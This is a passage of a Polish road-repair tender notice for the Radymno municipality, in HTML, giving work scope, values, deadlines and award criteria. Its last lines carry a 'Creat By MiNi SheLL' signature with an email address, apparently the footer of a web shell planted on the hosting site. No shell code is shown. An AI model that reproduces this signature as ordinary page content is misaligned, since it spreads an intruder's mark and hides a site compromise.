2. Szczegółowy zakres robót  zawiera    kosztorys  ofertowy  stanowiący załącznik do SIWZ  - Rozdział II Formularz Nr 2.4,  oraz  specyfikacje techniczne   wykonania i odbioru robót    zawarte  w  Rozdziale IV niniejszej Specyfikacji  Istotnych Warunków Zamówienia.   
 3. Zaleca się dokonania przez Wykonawców   wizji lokalnej   na terenie będącym przedmiotem niniejszego zamówienia ,  w celu dokonania   oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być niezbędne  w przygotowaniu oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45233140-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  138211.38<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Zadanie Nr 6- gmina Radymno<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Szczegółowy zakres przedmiotowy  niniejszego zamówienia swoim zakresem   obejmuje wykonanie:
 1) Roboty remontowe- frezowanie nawierzchni bitumicznych o grub. do 5 cm z wywozem materiału z rozbiórki na    
   odl.   do 5km  wskazaną przez Inspektora Nadzoru,
 2) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków do 5 cm,
 3) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków powyżej 5 cm,
 4) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego bez obcinania krawędzi,
 5) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego z obcinaniem krawędzi,
 6) Wyrównanie istniejącej podbudowy tłuczniem kamiennym o grub. 5-10 cm po zagęszczeniu,
 7) Wyrównanie istniejącej nawierzchni betonem asfaltowym mechanicznie.
UWAGA:
 Wykonawca zobowiązany jest prowadzić remont cząstkowy nawierzchni w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. W ciągu dnia remontować można jezdnie jedynie poza godzinami szczytu, natomiast w punktach newralgicznych ( miastach) w godzinach szczytu wyłącznie za zezwoleniem Inspektora Nadzoru Zabrania się wykonywania remontów na głównych ciągach komunikacyjnych (w tym miasta) w piątki i dni przedświąteczne. Na drogach tych i w okresie zabronionym mogą być remontowane miejsca zagrażające bezpieczeństwu ruchu na wyraźne polecenie Inspektora Nadzoru.
Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca. 
 Wykonawca zobowiązany jest do oznakowania miejsca wykonania robót , zgodnie z ROZPORZĄDZENIEM MINISTRA INFRASTRUKTURY z dnia 3 lipca 2003r.w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach i utrzymywania tego oznakowania w należytym stanie przez cały czas wykonywania robót remontowych. 
2. Szczegółowy zakres robót  zawiera    kosztorys  ofertowy  stanowiący załącznik do SIWZ  - Rozdział II Formularz Nr 2.5,  oraz  specyfikacje techniczne   wykonania i odbioru robót    zawarte  w  Rozdziale IV niniejszej Specyfikacji  Istotnych Warunków Zamówienia.   
 3. Zaleca się dokonania przez Wykonawców   wizji lokalnej   na terenie będącym przedmiotem niniejszego zamówienia ,  w celu dokonania   oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być niezbędne  w przygotowaniu oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45233140-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  40650.41<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com